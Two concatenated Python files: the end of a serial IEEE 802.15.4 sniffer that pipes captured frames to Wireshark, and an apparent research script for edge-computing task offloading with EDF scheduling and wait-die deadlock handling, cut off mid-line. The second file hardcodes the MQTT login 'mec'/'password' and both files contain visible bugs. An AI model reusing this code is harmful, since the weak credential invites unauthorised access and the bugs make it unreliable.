Print away if cmd == CMD_CHANNEL: self.rx_channel = b[0] print('Sniffing in channel: %d' % (b[0],)) elif cmd == CMD_CHANNEL_MIN: print('Min channel: %d' % (b[0],)) elif cmd == CMD_CHANNEL_MAX: print('Max channel: %d' % (b[0],)) elif cmd == CMD_PREAMBLE_CODE: print('Current preamble code %d' % (b[0],)) elif cmd == CMD_PRF: print('Current PRF %dMHz' % (b[0],)) else: logger.warning("Received a command response with unknown code") return '' def __write_command(self, cmd, len = 0, data = bytearray()): bytes = bytearray((SNIFFER_PROTO_VERSION, cmd)) if len > 0: bytes += bytearray((len >> 8, len & 0xFF)) if data is not None: bytes += data self.port.write(self.__sensniff_magic) self.port.write(bytes) self.port.flush() logger.debug('Sent bytes: [' + ''.join('%02x ' % c for c in self.__sensniff_magic) + ''.join('%02x ' % c for c in bytes).rstrip() + ']') def set_channel(self, channel): self.__write_command(CMD_SET_CHANNEL, 1, bytearray((channel,))) def set_preamble_code(self, code): self.__write_command(CMD_SET_PREAMBLE_CODE, 1, bytearray((code,))) def set_pulse_repetition_frequency(self, prf): self.__write_command(CMD_SET_PRF_CODE, 1, bytearray((prf,))) def get_channel(self): self.__write_command(CMD_GET_CHANNEL) def get_channel_min(self): self.__write_command(CMD_GET_CHANNEL_MIN) def get_channel_max(self): self.__write_command(CMD_GET_CHANNEL_MAX) ##################################### class AutodetectSerialInterfaces(object): """ Automatically finds sensniff supported devices. Is used when the user does not supply the serial ports """ # def __init__(self): def find_interfaces(self) -> typing.List[str]: """ Autodetect sensniff devices """ all_devices = os.listdir("/dev") supported_devices = list(filter(lambda x: "cu.usb" in x, all_devices)) return ["/dev/"+d for d in supported_devices] ##################################### class FifoOutHandler(object): """ pcap_tap = If true the TAP Format with channel information will be used """ def __init__(self, out_fifo, pcap_tap=False): self.out_fifo = out_fifo self.of = None self.needs_pcap_hdr = True self.pcap_tap = pcap_tap stats['Piped'] = 0 stats['Not Piped'] = 0 self.__create_fifo() def __create_fifo(self): try: os.mkfifo(self.out_fifo) logger.info('Opened FIFO %s' % (self.out_fifo,)) except OSError as e: if e.errno == errno.EEXIST: if stat.S_ISFIFO(os.stat(self.out_fifo).st_mode) is False: logger.error('File %s exists and is not a FIFO' % (self.out_fifo,)) sys.exit(1) else: logger.warning('FIFO %s exists. 
Using it' % (self.out_fifo,)) else: raise def __open_fifo(self): try: fd = os.open(self.out_fifo, os.O_NONBLOCK | os.O_WRONLY) self.of = os.fdopen(fd, 'wb') except OSError as e: if e.errno == errno.ENXIO: logger.warning('Remote end not reading') stats['Not Piped'] += 1 self.of = None self.needs_pcap_hdr = True elif e.errno == errno.ENOENT: logger.error('%s vanished under our feet' % (self.out_fifo,)) logger.error('Trying to re-create it') self.__create_fifo_file() self.of = None self.needs_pcap_hdr = True else: raise def handle(self, data): if self.of is None: self.__open_fifo() if self.of is not None: try: if self.needs_pcap_hdr is True: if self.pcap_tap is True: self.of.write(get_global_header(LINKTYPE_IEEE802_15_4_TAP)) else: self.of.write(get_global_header(LINKTYPE_IEEE802_15_4)) # self.of.write(pcap_global_hdr) self.needs_pcap_hdr = False if self.pcap_tap: self.of.write(data.get_pcap_tap()) else: self.of.write(data.pcap) self.of.flush() logger.info('Wrote a frame of size %d bytes' % (data.len)) stats['Piped'] += 1 except IOError as e: if e.errno == errno.EPIPE: logger.info('Remote end stopped reading') stats['Not Piped'] += 1 self.of = None self.needs_pcap_hdr = True else: raise ##################################### class PcapDumpOutHandler(object): def __init__(self, out_pcap, pcap_tap=False): """ Handler to dump the received frames in a pcap file that should be read by wireshark. pcap_tap: If true the TAP frame format will be used to deliver channel information. """ self.out_pcap = out_pcap self.pcap_tap = pcap_tap stats['Dumped to PCAP'] = 0 try: self.of = open(self.out_pcap, 'wb') self.of.write(pcap_global_hdr) logger.info("Dumping PCAP to %s" % (self.out_pcap,)) except IOError as e: self.of = None logger.warning("Error opening %s to save pcap. Skipping" % (out_pcap)) logger.warning("The error was: %d - %s" % (e.args)) def handle(self, frame): if self.of is None: return if self.pcap_tap: self.of.write(frame.get_pcap_tap()) else: self.of.write(frame.get_pcap()) self.of.flush() logger.info('PcapDumpOutHandler: Dumped a frame of size %d bytes' % (frame.len)) stats['Dumped to PCAP'] += 1 ##################################### class HexdumpOutHandler(object): def __init__(self, of): stats['Dumped as Hex'] = 0 try: self.of = open(of, 'w') logger.info("Dumping hex to %s" % (of,)) except IOError as e: logger.warning("Error opening %s for hex dumps. Skipping" % (of)) logger.warning("The error was: %d - %s" % (e.args)) self.of = None def handle(self, frame): if self.of is None: return try: self.of.write('0000 ') self.of.write(frame.get_hex()) self.of.write('\n') self.of.flush() stats['Dumped as Hex'] += 1 logger.info('HexdumpOutHandler: Dumped a frame of size %d bytes' % (frame.len)) except IOError as e: logger.warning("Error writing hex to %s for hex dumps. Skipping" % (self.of)) logger.warning("The error was: %d - %s" % (e.args)) ##################################### def arg_parser(): debug_choices = ('DEBUG', 'INFO', 'WARN', 'ERROR') parser = argparse.ArgumentParser(add_help = False, description = 'Read IEEE802.15.4 frames \ from a sensniff enabled device, convert them to pcap and pipe them \ into wireshark over a FIFO pipe for online analysis. Frames \ can also be saved in a file in hexdump and/or pcap format for offline \ analysis.') in_group = parser.add_argument_group('Serial Line Options') in_group.add_argument('-b', '--baud', type = int, action = 'store', default = defaults['baud_rate'], help = 'Set the line\'s baudrate to BAUD. \ Only makes sense with -d. 
\ (Default: %s)' % (defaults['baud_rate'],)) in_group.add_argument('-r', '--rts-cts', action = 'store_true', default = False, help = 'Set to enable H/W flow control \ (Default: Flow control disabled.)') out_group = parser.add_argument_group('Output Options') out_group.add_argument('-o', '--out-file', action = 'store', nargs = '?', const = defaults['out_file'], default = False, help = 'Save the capture (hexdump) file OUT_FILE. \ If -o is specified but OUT_FILE is omitted, \ stdout will be used. If the argument is \ omitted altogether, the capture will not \ be saved.') out_group.add_argument('-p', '--pcap', action = 'store', nargs = '?', const = defaults['out_pcap'], default = False, help = 'Save the capture (pcap format) in PCAP. \ If -p is specified but PCAP is omitted, \ %s will be used. If the argument is \ omitted altogether, the capture will not \ be saved.' % (defaults['out_pcap'],)) out_group.add_argument('-pt', '--pcap-tap', action='store_true', default=False, help=""" Use a pcap tap header format that includes more information on the received frames, like the channel it has been received ob """) out_group.add_argument('-F', '--fifo', action = 'store', default = defaults['out_fifo'], help = 'Pipe the capture through FIFO \ (Default: %s)' % (defaults['out_fifo'],)) out_group.add_argument('-O', '--offline', action = 'store_true', default = False, help = 'Disable piping (Mainly used for debugging) \ (Default: Piping enabled)') log_group = parser.add_argument_group('Verbosity and Logging') log_group.add_argument('-n', '--non-interactive', action = 'store_true', default = False, help = 'Run in non-interactive mode, without \ accepting user input. (Default Disabled)') log_group.add_argument('-D', '--debug-level', action = 'store', choices = debug_choices, default = defaults['debug_level'], help = 'Print messages of severity DEBUG_LEVEL \ or higher (Default %s)' % (defaults['debug_level'],)) log_group.add_argument('-L', '--log-file', action = 'store', nargs = '?', const = defaults['log_file'], default = False, help = 'Log output in LOG_FILE. If -L is specified \ but LOG_FILE is omitted, %s will be used. \ If the argument is omitted altogether, \ logging will not take place at all.' % (defaults['log_file'],)) log_group.add_argument('-l', '--log-level', action = 'store', choices = debug_choices, default = defaults['log_level'], help = 'Log messages of severity LOG_LEVEL or \ higher. Only makes sense if -L is also \ specified (Default %s)' % (defaults['log_level'],)) dev_group = parser.add_argument_group('Device options') # Multidevice dev_group.add_argument('-d', '--device', action = 'store', default = defaults['device'], nargs="*", type=str, help = 'Read from device DEVICE \ (Default: %s). \ Add multiple devices if you want to sniff on multiple channels.\ Multiple devices will automatically activate non-interactive mode ' % (defaults['device'],)) # Autodetect dev_group.add_argument('-a', '--autodetect', action='store_true', default=False, help = 'In this mode the connect sniffer device\ will switch through all available PRFs\ (16 MHz & 64MHz) and preamble codes (0-31)\ and try to find other devices sending data.' 
) gen_group = parser.add_argument_group('General Options') gen_group.add_argument('-v', '--version', action = 'version', version = 'sensniff v%s' % (__version__)) gen_group.add_argument('-h', '--help', action = 'help', help = 'Shows this message and exits') return parser.parse_args() ##################################### def dump_stats(): print('Frame Stats:') for k, v in list(stats.items()): print('%20s: %d' % (k, v)) ##################################### def log_init(): logger.setLevel(logging.INFO) ch = logging.StreamHandler() ch.setLevel(getattr(logging, args.debug_level)) cf = logging.Formatter('%(message)s') ch.setFormatter(cf) logger.addHandler(ch) if args.log_file is not False: fh = logging.handlers.RotatingFileHandler(filename = args.log_file, maxBytes = 5000000) fh.setLevel(getattr(logging, args.log_level)) ff = logging.Formatter( '%(asctime)s - %(levelname)8s - %(message)s') fh.setFormatter(ff) logger.addHandler(fh) ##################################### def interact_with_serial(input_handler: SerialInputHandler, out_handlers: typing.List): while 1: if args.non_interactive is False: try: if select.select([sys.stdin, ], [], [], 0.0)[0]: cmd = sys.stdin.readline().strip() logger.info('User input: "%s"' % (cmd,)) if cmd in ('h', '?'): print(help_str) elif cmd == 'c': input_handler.get_channel() elif cmd == 'm': input_handler.get_channel_min() elif cmd == 'M': input_handler.get_channel_max() elif cmd == 'n': f.needs_pcap_hdr = True elif cmd == 'q': logger.info('User requested shutdown') dump_stats() sys.exit(0) elif "p " in cmd: code = cmd.split(" ")[1] if int(code) in range(0, 0xFFFF): input_handler.set_preamble_code(int(code)) elif "r " in cmd: rate = cmd.split(" ")[1] if int(rate) in range(0,128): input_handler.set_pulse_repetition_frequency(int(rate)) elif int(cmd) in range(0, 0xFFFF): input_handler.set_channel(int(cmd)) else: raise ValueError except select.error: logger.warning('Error while trying to read stdin') except ValueError: print(err_str) except UnboundLocalError: # Raised by command 'n' when -o was specified at command line pass try: raw = input_handler.read_frame() if len(raw) > 0: t = time.time() timestamps = stats['Timestamps'] t_len = len(timestamps) if t_len > 0 and timestamps[t_len-1] > 0: # Fetch the last timestamp and convert it to seconds. t = timestamps[t_len-1] / 1000000 frame = Frame(bytearray(raw), t, channel=input_handler.rx_channel) for h in out_handlers: h.handle(frame) except (KeyboardInterrupt, SystemExit): logger.info('Shutting down') dump_stats() sys.exit(0) ##################################### def serial_read(input_handler: SerialInputHandler, out_handlers: typing.List): """ Read from serial without interaction """ while not stop: raw = input_handler.read_frame() if len(raw) > 0: t = time.time() timestamps = stats['Timestamps'] t_len = len(timestamps) if t_len > 0 and timestamps[t_len-1] > 0: # Fetch the last timestamp and convert it to seconds. 
                t = timestamps[t_len-1] / 1000000
            frame = Frame(bytearray(raw), t, channel=input_handler.rx_channel)
            for h in out_handlers:
                h.handle(frame)


#####################################
if __name__ == '__main__':
    args = arg_parser()
    log_init()

    logger.info('Started logging')

    input_handler: SerialInputHandler = None
    in_handlers = []
    devices: typing.List[str] = list()
    if not args.device:
        # Find devices
        devices = AutodetectSerialInterfaces().find_interfaces()
    else:
        devices = args.device

    if len(devices) == 1:
        input_handler = SerialInputHandler(port = devices[0],
                                           baudrate = args.baud,
                                           rts_cts = args.rts_cts)
        time.sleep(2)
        input_handler.set_channel(args.channels[0])
        in_handlers.append(input_handler)
    else:
        # Sniff on multiple devices
        for device in devices:
            s = SerialInputHandler(port = device,
                                   baudrate = args.baud,
                                   rts_cts = args.rts_cts)
            time.sleep(2)
            in_handlers.append(s)
        args.non_interactive = True

    out_handlers = []
    if args.offline is not True:
        f = FifoOutHandler(out_fifo = args.fifo, pcap_tap=args.pcap_tap)
        out_handlers.append(f)
    if args.out_file is not False:
        out_handlers.append(HexdumpOutHandler(of = args.out_file))
    if args.pcap is not False:
        out_handlers.append(PcapDumpOutHandler(args.pcap, args.pcap_tap))

    if args.non_interactive is False:
        help_str = ("Commands:\n"
                    "h,?: Print this message\n"
                    "q: Quit")
        err_str = 'Unknown Command. Type h or ? for help'
        print(help_str)

    threads = list()
    if len(in_handlers) == 1:
        if not args.non_interactive:
            interact_with_serial(input_handler, out_handlers)
        else:
            # single handler, non-interactive: read from it in a worker thread
            t = Thread(target=serial_read, args=(input_handler, out_handlers))
            threads.append(t)
            t.start()
    else:
        for i in in_handlers:
            t = Thread(target=serial_read, args=(i, out_handlers))
            threads.append(t)
            t.start()

    try:
        logger.info("Start sniffing")
        # for t in threads:
        #     t.join()
        while 1:
            time.sleep(0.1)
    except (KeyboardInterrupt, SystemExit):
        logger.info('Shutting down')
        stop = True
        dump_stats()
        sys.exit(0)
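

#####################################
# Editor's sketch (added; not part of the original tool): writing a synthetic
# capture without any serial hardware, using the Frame and PcapDumpOutHandler
# classes defined above. The three payload bytes, channel 11 and 'demo.pcap'
# are illustrative placeholders, not real IEEE 802.15.4 traffic.
#####################################
def _example_offline_dump(path='demo.pcap', use_tap=False):
    """Dump one fake frame to `path` so it can be inspected offline."""
    handler = PcapDumpOutHandler(path, pcap_tap=use_tap)
    fake = Frame(bytearray(b'\x01\x02\x03'), time.time(), channel=11)
    # handle() appends the per-frame pcap header plus either the raw bytes or,
    # when use_tap is True, the TAP framing built by Frame.get_pcap_tap()
    # (FCS-type and channel TLVs in front of the payload).
    handler.handle(fake)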
15_edf_wait_die_gui.py
from functools import reduce from sys import * import numpy as np import random as r import ping_code as pc import socket import struct import subprocess as sp import threading from threading import Thread import ast import time import datetime as dt import os import getpass as gp import psutil from drawnow import * from matplotlib import pyplot as plt from netifaces import interfaces, ifaddresses, AF_INET import paho.mqtt.client as mqtt import smtplib import config import matplotlib matplotlib.use('TkAgg') hosts = {} # {hostname: ip} _tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15}, 't2': {'wcet': 1, 'period': 5, 'deadline': 4}, 't3': {'wcet': 2, 'period': 10, 'deadline': 8}, 't4': {'wcet': 1, 'period': 10, 'deadline': 9}, 't5': {'wcet': 3, 'period': 15, 'deadline': 12} } # mat = {'p0': ['cpu', 'mem', 'storage']} _need = { 't1': [7, 4, 3], 't2': [1, 2, 2], 't3': [6, 0, 0], 't4': [0, 1, 1], 't5': [4, 3, 1] } allocation = { 't1': [0, 1, 0], 't2': [2, 0, 0], 't3': [3, 0, 2], 't4': [2, 1, 1], 't5': [0, 0, 2] } test = [] _time = [] color_code = ['orange', 'brown', 'purple', 'pink', 'blue'] style = ['g--^', 'r:o', 'b-.s', 'm--*', 'k-.>', 'c-.s'] style1 = [{'color': 'g', 'marker': '^'}, {'color': 'aqua', 'marker': '*'}, {'color': 'purple', 'marker': 'X'}, {'color': 'r', 'marker': 'v'}, {'color': 'k', 'marker': '>'}, {'color': 'brown', 'marker': 'D'}, {'color': 'b', 'marker': 's'}, {'color': 'c', 'marker': '1'}, {'color': 'olive', 'marker': 'p'},] mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]} offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload reoffload_list = [[], {}] discovering = 0 mec_rtt = {} # {ip: [RTT]} thread_record = [] # keeps track of threads prev_t = 0 # variable for cpu util _cpu = [] # cpu plot list _off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec _off_cloud = 0 # used to keep a count of tasks offloaded to cloud _loc = 0 # used to keep a count of tasks executed locally _inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec deadlock = [1] # keeps count of how many deadlock is resolved _pos = 0 received_task_queue = [] # [[(task_list,wait_time), host_ip], ....] _port_ = 64000 cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud cloud_port = 63000 memory = [] stop = 0 t_track = 1 received_time = [] task_record = {} # keeps record of task reoffloaded task_id = 0 # id for each task reoffloaded shared_resource_lock = threading.Lock() fig = plt.figure() ax1 = fig.add_subplot(231) ax2 = fig.add_subplot(232) ax3 = fig.add_subplot(233) ax4 = fig.add_subplot(234) ax5 = fig.add_subplot(235) ax6 = fig.add_subplot(236) def discovering_group(): global sock1 multicast_group = '224.3.29.71' server_address = ('', 10000) # Create the socket sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Bind to the server address sock1.bind(server_address) # Tell the operating system to add the socket to the multicast group # on all interfaces. group = socket.inet_aton(multicast_group) mreq = struct.pack('4sL', group, socket.INADDR_ANY) sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) def offloading_group(): global sock2 multicast_group = '224.5.5.55' server_address = ('', 20000) # Create the socket sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Bind to the server address sock2.bind(server_address) # Tell the operating system to add the socket to the multicast group # on all interfaces. 
group = socket.inet_aton(multicast_group) mreq = struct.pack('4sL', group, socket.INADDR_ANY) sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq) def _mov_avg(a1): ma1 = [] # moving average list avg1 = 0 # moving average pointwise count = 0 for i in range(len(a1)): count += 1 avg1 = ((count-1)*avg1+a1[i])/count ma1.append(round(avg1, 4)) # cumulative average formula # μ_n=((n-1) μ_(n-1) + x_n)/n return ma1 def percent(value, total): if value > 0: return round((value/total)*100, 2) else: return 0 def plot_offloaded_remote(): keys = ['O-Out', 'Cloud', 'Local', 'O-In'] total = _off_mec + _off_cloud + _loc + _inward_mec val = [percent(_off_mec, total), percent(_off_cloud, total), percent(_loc, total), percent(_inward_mec, total)] cols = ['r', 'g', 'b', 'm'] ypos = ([0, 1, 2, 3]) ''' explode = [] for i in val: if i == max(val): explode.append(0.1) else: explode.append(0) ax2.pie(val, labels=keys, autopct='%.3f%%', wedgeprops=dict(width=0.5), startangle=-40, shadow=True, explode=explode, colors=cols) ''' values = [_off_mec, _off_cloud, _loc, _inward_mec] for i in values: j = values.index(i) ax2.text(j-0.1, values[j], '{}%'.format(val[j]), rotation=0, ha="center", va="center", bbox=dict(boxstyle="round", ec=(1., 0.5, 0.5), fc=(1., 0.8, 0.8), )) ax2.set_xticks(ypos) ax2.set_xticklabels(keys) ax2.bar(ypos, values, align='center', color=cols, alpha=0.3) ax2.set_title('Local/Remote Execution Report') plt.subplot(ax2) # color=color_code[list(hosts.values()).index(i)] def plot_deadlock(): # cols = ['r'] text = str(deadlock[-1] - 1) + " Deadlock Resolved" ''' wedges, texts, autotexts = ax5.pie(deadlock, shadow=True, autopct=text, textprops=dict(rotation_mode='anchor', color="w", ha='left'), colors=cols) plt.setp(autotexts, size=9, weight="bold") ''' ax5.text(0.5, 0.6, text, rotation=0, size=10, ha="center", va="center", bbox=dict(boxstyle="round", ec=(0., 0., 0.), fc=(0.7, 0.9, 1.))) ax5.text(0.5, 0.45, '{} Tasks Received'.format(_loc+_inward_mec), rotation=0, size=10, ha="center", va="center", bbox=dict(boxstyle="round", ec=(0., 0., 0.), fc=(0.98, 0.96, 0.59), )) # ax5.set_title("Deadlock Resolved Counter") ax5.set_axis_off() plt.subplot(ax5) def plot_memory(): global memory memory.append(round(algo.memory_percent(), 4)) ax6.grid(True) ax6.plot(list(range(len(_mov_avg(memory)))), _mov_avg(memory), linewidth=2, label='Memory', color='m') # ax6.set_title('Moving Memory Utilization') ax6.set_ylabel('Moving Memory') ax6.set_xlabel('Time (seconds)') ax6.fill_between(list(range(len(_mov_avg(memory)))), _mov_avg(memory), 0, alpha=0.5, color='m') ax6.legend() plt.subplot(ax6) def plot_wait_time(): ax1.grid(True) for i in mec_waiting_time: mv = _mov_avg(mec_waiting_time[i]) pt = mv[0:len(mv):int((len(mv) / 7)) + 1] if pt[-1] != mv[-1]: pt.append(mv[-1]) d = list(range(len(mv))) ptx = d[0:len(d):int((len(d) / 7)) + 1] if ptx[-1] != d[-1]: ptx.append(d[-1]) if len(ptx) > len(pt): ptx=ptx[:-1] elif len(ptx) < len(pt): pt=pt[:-1] ax1.plot(ptx, pt, **style1[list(hosts.values()).index(i)], linestyle=(0, (3, 1, 1, 1, 1, 1)), linewidth=2, label=i) ax1.set_title('Waiting Time Queue') ax1.set_ylabel('Moving Wait + RTT') # ax2.set_xlabel('Time (seconds)') ax1.legend() plt.subplot(ax1) def get_mec_rtts(): for i in mec_rtt: mec_rtt[i].append(get_rtt(i)) def plot_rtts(): get_mec_rtts() ax3.grid(True) for i in mec_rtt: mv = _mov_avg(mec_rtt[i]) pt = mv[0:len(mv):int((len(mv) / 7)) + 1] if pt[-1] != mv[-1]: pt.append(mv[-1]) d = list(range(len(mv))) ptx = d[0:len(d):int((len(d) / 7)) + 1] if ptx[-1] != d[-1]: 
ptx.append(d[-1]) if len(ptx) > len(pt): ptx=ptx[:-1] elif len(ptx) < len(pt): pt=pt[:-1] ax3.plot(ptx, pt, **style1[list(hosts.values()).index(i)], linestyle=(0, (3, 1, 1, 1, 1, 1)), linewidth=2, label=i) ax3.set_title('RTT Utilization over Time') ax3.set_ylabel('Moving RTT') # ax3.set_xlabel('Time (seconds)') ax3.legend() plt.subplot(ax3) def plot_cpu(): global prev_t # get cpu next_t = psutil.cpu_percent(percpu=False) delta = abs(prev_t - next_t) prev_t = next_t _cpu.append(round(delta, 4)) # plot graph ax4.grid(True) ax4.plot(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), linewidth=2, label='CPU') # ax4.set_title('Moving CPU Utilization') ax4.set_ylabel('Moving CPU') ax4.set_xlabel('Time (seconds)') ax4.fill_between(list(range(len(_mov_avg(_cpu)))), _mov_avg(_cpu), 0, alpha=0.5) ax4.legend() plt.subplot(ax4) def plot_graphs(): plot_offloaded_remote() plot_wait_time() plot_rtts() plot_cpu() plot_deadlock() plot_memory() fig.suptitle('MEC Performance During Deadlock Experiment') def show_graphs(): drawnow(plot_graphs) def ip_address(): try: # cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1'] cmd = ['ifconfig ens4 | grep inet | head -n 1 | cut -d "t" -f 2 | cut -d " " -f 2'] address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1] if len(address.strip().split('.')) == 4: return address.strip() else: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] except Exception as e: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) return s.getsockname()[0] def host_ip_set(): global ip_set ip_set = set() for ifaceName in interfaces(): addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])] ip_set.add(', '.join(addresses)) def get_rtt(host): rtt = pc.verbose_ping(host) if rtt: return round(rtt, 4) else: return get_rtt(host) def get_time(): _time_ = [] d = str(dt.datetime.utcnow()).split() _time_ += d[0].split('-') g = d[1].split('.') _time_ += g[0].split(':') _time_.append(g[1]) return _time_ def gcd(a, b): if b == 0: return a return gcd(b, a % b) def _lcm(a, b): return int(a * b / gcd(a, b)) def lcm(_list): return reduce(_lcm, _list) def gosh_dist(_range): return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range def on_connect(connect_client, userdata, flags, rc): # print("Connected with Code :" +str(rc)) # Subscribe Topic from here connect_client.subscribe(node_id) # Callback Function on Receiving the Subscribed Topic/Message def on_message(message_client, userdata, msg): data = str(msg.payload, 'utf-8') if data[0] == 'c': # receive from cloud received_task = data[2:] # send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]]) if received_task in task_record: del task_record[received_task] received_task = '.'.join(received_task.split('.')[:-1]) _client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), ) cooperate['cloud'] += 1 count_task_sent(received_task) elif data[0] == 't': # receive from client received_task = ast.literal_eval(data[2:]) received_task_queue.append(received_task) received_time.append(time.time()) else: print('data: ', data) def connect_to_broker(): global _client global broker_ip username = 'mec' password = 'password' broker_ip = hosts['speaker'] broker_port_no = 1883 _client = mqtt.Client() _client.on_connect = on_connect _client.on_message = on_message _client.username_pw_set(username, password) _client.connect(broker_ip, 
broker_port_no, 60) _client.loop_forever() def task_time_map(seq, process): exe_seq = [] capacity_sum = 0 for job in process: capacity_sum += process[job]['wcet'] while capacity_sum > 0: for job in seq: if process[job]['wcet'] > 0: exe_seq.append(job) process[job]['wcet'] -= 1 capacity_sum -= 1 return exe_seq total_received_task = 0 def edf(): global total_received_task t_lcm = lcm([tasks[i]['period'] for i in tasks]) t_dead = {i: tasks[i]['deadline'] for i in tasks} sorted_dead = sorted(t_dead.items(), key=lambda kv: (kv[1], kv[0])) # print(sorted_dead) ready_task = [] for i in sorted_dead: period = tasks[i[0]]['period'] # print('lcm: ', t_lcm, ' period: ', period) t_range = int(t_lcm/period) last_dead = 0 for j in range(t_range): ready_task.append((i[0], last_dead+tasks[i[0]]['deadline'])) last_dead += period ready_task = sorted(ready_task, key=lambda t: t[1]) print(ready_task) t_time_ = 0 schedule = [] missed = [] register = {i: 0 for i in tasks.keys()} # {ti : amount executed} for i in ready_task: if (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]: while (t_time_//tasks[i[0]]['period'])+1 <= register[i[0]]: t_time_ += 1 # schedule.append(('idle', t_time)) if (t_time_//tasks[i[0]]['period'])+1 > register[i[0]]: if t_time_ + tasks[i[0]]['wcet'] <= i[1]: register[i[0]] += 1 t_time_ += tasks[i[0]]['wcet'] schedule.append(i[0]) else: print('Deadline missed: ', i) missed.append(i[0]) # print('s : ', schedule) # print('r: ', register) if len(missed) > 0: # print('missed deadline: ', missed) cooperative_mec(missed) _edf_ = task_time_map(schedule, tasks) total_received_task += len(_edf_) return _edf_ # generate execution sequence def wait_die(processes, avail, n_need, allocat): global deadlock offload = [] # To store execution sequence exec_seq = [] # Make a copy of available resources work = [0] * len(processes) # While all processes are not finished # or system is not in safe state. 
while 'w' or 0 in work: if 0 in work: ind = work.index(0) i = processes[ind] elif 'w' in work: # print('wk: ', work) ind = work.index('w') i = processes[ind] else: break # print('comparing| process: ', i, _need[i], 'work: ', avail) if not (False in list(np.greater_equal(avail, n_need[i]))): exec_seq.append(i) avail = np.add(avail, allocat[i]) work[ind] = 1 # print('added: ', exec_seq) else: a = list(set(processes) - set(exec_seq) - set(offload)) n = {} for j in a: n[j] = sum(allocat[j]) _max = max(n, key=n.get) # print('work: ', work, 'need: ', _need[_max]) if processes.index(_max) > processes.index(i): # if true, i is older # if process is already waiting then offload process if work[ind] == 'w': offload.append(i) avail = np.array(avail) + np.array(allocat[i]) work[processes.index(i)] = 1 # print('offload reentry: ', i, offload) else: # wait put process to waiting work[processes.index(i)] = 'w' # print('waiting: ', i) else: # abort i offload.append(i) avail = np.array(avail) + np.array(allocat[i]) work[processes.index(i)] = 1 # print('offload: ', i) if len(offload) > 0: print('offloading tasks: ', offload) cooperative_mec(offload) deadlock[0] += 1 print('Execution seq: ', exec_seq) return exec_seq def get_exec_seq(pro): # Number of processes p = len(pro) processes = ['{}_{}'.format(pro[i], i) for i in range(p)] # Available instances of resources avail = [6, 5, 5] n_need = {i: _need[i[:2]] for i in processes} # print('need', n_need) # Resources allocated to processes allot = {i: allocation[i[:2]] for i in processes} # return execution sequence return wait_die(processes, avail, n_need, allot) def calc_wait_time(list_seq): pre = 0 time_dic = {} for i in list_seq: j = i.split('_')[0] # i = 't5_3_3', j = 't5_3' time_dic[i] = round(t_time[j][0] + pre, 3) pre += t_time[j][0] # waiting time = total waiting time ÷ 2 average waiting time might be too tight w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3) send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs return time_dic def compare_local_mec(list_seq): time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq} print('local vs MEC comparison: ', time_compare_dict) execute_mec = [] execute_locally = [] for i in time_compare_dict: if time_compare_dict[i]: execute_locally.append(i) else: execute_mec.append(i) return execute_mec, execute_locally def calculate_mov_avg(ma1, a1): if ma1 in mec_waiting_time: _count = len(mec_waiting_time[ma1]) avg1 = mec_waiting_time[ma1][-1] else: _count = 0 avg1 = 0 _count += 1 avg1 = ((_count - 1) * avg1 + a1) / _count # ma1.append(avg1) #cumulative average formula # μ_n=((n-1) μ_(n-1) + x_n)/n return round(avg1, 4) def send_message(mg): _multicast_group = ('224.3.29.71', 10000) try: # Send data to the multicast group if mg == 'hello': smg = mg + ' ' + str([get_hostname(), ip_address()]) sock1.sendto(str.encode(smg), _multicast_group) print('\nHello message sent') else: sock1.sendto(str.encode(mg), _multicast_group) except Exception as e: print(e) def get_hostname(): cmd = ['cat /etc/hostname'] hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1] return hostname def receive_message(): global hosts while True: if stop == 1: print('Stopped : receive_message') break else: data, address = sock1.recvfrom(1024) _d = data.decode() if _d[:5] == 'hello': _data = ast.literal_eval(_d[6:]) hosts[_data[0]] = _data[1] # print('received: ', hosts) if _data[1] != host_ip: mec_rtt[_data[1]] = [] elif (data.decode()[:6] == 'update') and 
(discovering == 0): hosts = ast.literal_eval(data.decode()[7:]) for i in hosts: if i != host_ip: mec_rtt[i] = [] elif _d[:2] == 'wt': split_data = _d.split() if split_data[1] != host_ip: # calcuate moving average of mec wait time => w_time = wait time + rtt w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(address[0])) if split_data[1] in mec_waiting_time: mec_waiting_time[split_data[1]].append(w_time) else: mec_waiting_time[split_data[1]] = [w_time] def mec_comparison(): # returns min average waiting for all mecs if len(mec_waiting_time) == 0: return 0 min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time} min_wt = min(min_mec, key=min_mec.get) return min_wt def cooperative_mec(mec_list): global _off_cloud global _off_mec global task_id, task_record for i in mec_list: _host = mec_comparison() if _host == 0: # send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time] _send_task = f"{i.split('_')[0]}.{task_id}" _client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), ) task_record[_send_task] = 'cloud' task_id += 1 _off_cloud += 1 # cloud_register[i.split('_')[0].split('.')[2]] = send_back_host print('\n=========SENDING {} TO CLOUD==========='.format(i)) else: j = i.split('_')[0] _max = np.array([6, 